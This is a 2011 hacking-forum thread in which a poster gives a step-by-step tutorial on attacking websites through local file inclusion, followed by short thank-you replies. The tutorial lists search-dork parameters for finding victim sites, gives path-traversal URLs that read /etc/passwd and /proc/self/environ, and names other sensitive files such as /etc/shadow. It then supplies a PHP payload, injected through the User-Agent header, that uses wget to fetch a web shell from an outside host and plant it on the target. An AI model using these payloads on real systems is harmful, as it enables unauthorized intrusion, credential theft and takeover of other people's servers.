Sinisterly
-=LFI TUTORIAL=- [ULTIMATE] - Printable Version

+- Sinisterly (https://sinister.ly)
+-- Forum: Hacking (https://sinister.ly/Forum-Hacking)
+--- Forum: Website & Server Hacking (https://sinister.ly/Forum-Website-Server-Hacking)
+--- Thread: -=LFI TUTORIAL=- [ULTIMATE] (/Thread-LFI-TUTORIAL-ULTIMATE)

Pages: 1 2 3

-=LFI TUTORIAL=- [ULTIMATE] - EVILKING - 10-06-2011

THERE IS 6 PARTS OF THIS TUTORIAL:::


1 – Introduction
2 – Finding LFI VULN. WEBSITE
3 – Checking if etc/passwd is accessible
4 – Checking if proc/self/environ is accessible
5 – Injecting malicious code
6 – Access our shell


LET'S BEGIN....

1 – Introduction

In this tutorial I show you how to upload a shell on websites using Local File Inclusion vulnerabilities and
injection malicious code in proc/self/environ.Is a step by step tutorial.


2 – Finding LFI

- Now we are going to find a Local File Inclusion vulnerable website.So we found our target,lets check it.
FOR THAT I CAN PASTE HERE SOME GOOD GOOGLE DORK USING THAT YOU CAN FIND LFI VULNERABLE WEBSITES

PHP Code:
JUST PUT "inurl:.php?"  BEFORE ALL DORKS

acion=
act=
action=
API_HOME_DIR=
board=
cat=
client_id=
cmd=
cont=
contact=
current_frame=
date=
detail=
dir=
display=
download=
f=
file=
fileinclude=
filename=
firm_id=
g=
getdata=
go=
HT=
idd=
inc=
incfile=
incl=
include_file=
include_path=
infile=
info=
ir=
lang=
language=
link=
load=
main=
mainspot=
msg=
num=
openfile=
p=
page=
pagina=
path=
path_to_calendar=
pg=
plik
qry_str=
ruta=
safehtml=
section=
showfile=
side=
site_id=
skin=
static=
str=
strona=
sub=
tresc=
url=
user

YOU CAN FIND MANY WEBSITES BUT ALL ARE NOT LFI VULNERABLE ....SO DON'T :nono: BE ANGRY....
BE COOLCool

EXAMPLE I CAN FIND WEBSITE ANME:

PHP Code:
www.example.com/view.php?page=contact.php 

NOW WE ARE GOING TO CHECK IF IT IS LFI VULNERABLE OR NOT.....FOR THAT WE CAN REPLACE contact.php WITH ../ SO URL BECOME

PHP Code:
www.example.com/view.php?page=../ 

AND WE GOT AN ERROR

PHP Code:
Warning: include(../) [function.include]: failed to open streamNo such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 

IF YOU GOT AN ERROR THEN IT IS LFI VULNERABLE ...AND IF YOU CAN NOT GET ERROR OR IF YOU GET BLANK PAGE THEN IT'S NOT LFI VULNERABLE...


3 - Now lets check for etc/passwd to see the if is Local File Inclusion vulnerable.Lets make a request :

PHP Code:
www.example.com/view.php?page=../../../etc/passwd 

we got error and no etc/passwd file

PHP Code:
Warning: include(../) [function.include]: failed to open streamNo such file or directory in /home/sirgod/public_html/website.com/view.php on line 1337 


SO WE GO MORE DIRECTORIES UP

PHP Code:
www.example.com/view.php?page=../../../../../etc/passwd 

we succesfully included the etc/passwd file.

PHP Code:
root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/newsuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin test:x:13:30:test:/var/test:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin 

THERE ARE ALSO GOOD DIRECTORIES THAT YOU CAN VISIT::

PHP Code:
/etc/shadow
/etc/group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default 


4 – Checking if proc/self/environ is accessible

- Now lets see if proc/self/environ is accessible.We replace etc/passwd with proc/self/environ

PHP Code:
www.example.com/view.php?page=../../../../../proc/self/environ 

IF YOU GET SOMETHING LIKE THIS

PHP Code:
DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/htmlapplication/xml;q=0.9application/xhtml+xmlimage/pngimage/jpegimage/gifimage/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2ad7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/index.php?view=../../../../../../etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=../../../../../../proc/self/environ REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=../../../../../../proc/self/environ SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster@website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE=Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.example.com Port 80 

proc/self/environ is accessible.If you got a blank page,an error proc/self/environ is not accessible

5 – Injecting malicious code

- Now let’s inject our malicious code in proc/self/environ.How we can do that?We can inject our code in User-Agent HTTP Header.
Use Tamper Data Addon for Firefox to change the User-Agent.Start Tamper Data in Firefox and request the URL :


PHP Code:
www.example.com/view.php?page=../../../../../proc/self/environ 

Choose Tamper and in User-Agent filed write the following code : TAMPER DATA IS AN ADDON OF MOZILLA FIREFOX ..JUST GOOGLE IT YOU FIND IT...

PHP Code:
<?system(‘wget http://www.drivehq.com/web/username/your shellname.txt -O shell.php’);?>

EXAMPLE:
PHP Code:
<?system(‘wget http://abcxyz.0adz.com/WSO.txt -O shell.php’);?>


If don’t work,try exec() because system() can be disabled on the webserver from php.ini

HERE "http://www.drivehq.com/web/username/your shellname.txt" IS A LOCATION OF YOUR SHELL...WHICH YOU HAVE TO PUT IN TXT FILE..

IT IS NOT NECESSORAY TO UPLOAD YOUR SHELL ON DRIVE HQ...

WHAT THIS CODE DO IS UPLOAD YOU TXT FILE TO LFI VULNERABLE WEBSITE AS shell.php


6 – Access our shell

- Now lets check if our malicous code was successfully injected.Lets check if the shell is present.

PHP Code:
www.example.com/shell.php 

OUR SHELL IS THERE INJECTION IS SUCCESSFULLY....
IF SHELL IS NOT THERE THAN TRY ANOTHER WEBSITE...

THANKS FOR READING....


-=EVILKING AN INDIAN HAXOR=-


RE: -=LFI TUTORIAL=- [ULTIMATE] - V1P3R - 10-08-2011

nice share Biggrin
thanks for it

RE: -=LFI TUTORIAL=- [ULTIMATE] - Access2emma - 10-08-2011

Nice tutorial. Thanks for sharing

RE: -=LFI TUTORIAL=- [ULTIMATE] - indonesia21 - 10-13-2011

Biggrin nice share brooo !!!
test now for me ..


RE: -=LFI TUTORIAL=- [ULTIMATE] - ghalib_awan - 10-13-2011

Nice tutorial man !!!!
screenshots would've helped greatly !!!!!
I am a newbie, gotta try this !!!!

RE: -=LFI TUTORIAL=- [ULTIMATE] - shadowtns - 10-22-2011

nice share man..thnxx a lot Biggrin

RE: -=LFI TUTORIAL=- [ULTIMATE] - jacm - 10-31-2011

Very usefull !
Thank you !!

RE: -=LFI TUTORIAL=- [ULTIMATE] - xononame - 10-31-2011

thx for thsi tutorial, helped a lot.....

RE: -=LFI TUTORIAL=- [ULTIMATE] - The Alchemist - 04-11-2012

great tutorial.... thanks for sharing...:-)

RE: -=LFI TUTORIAL=- [ULTIMATE] - The Alchemist - 04-11-2012

great tutorial.... thanks for sharing...:-)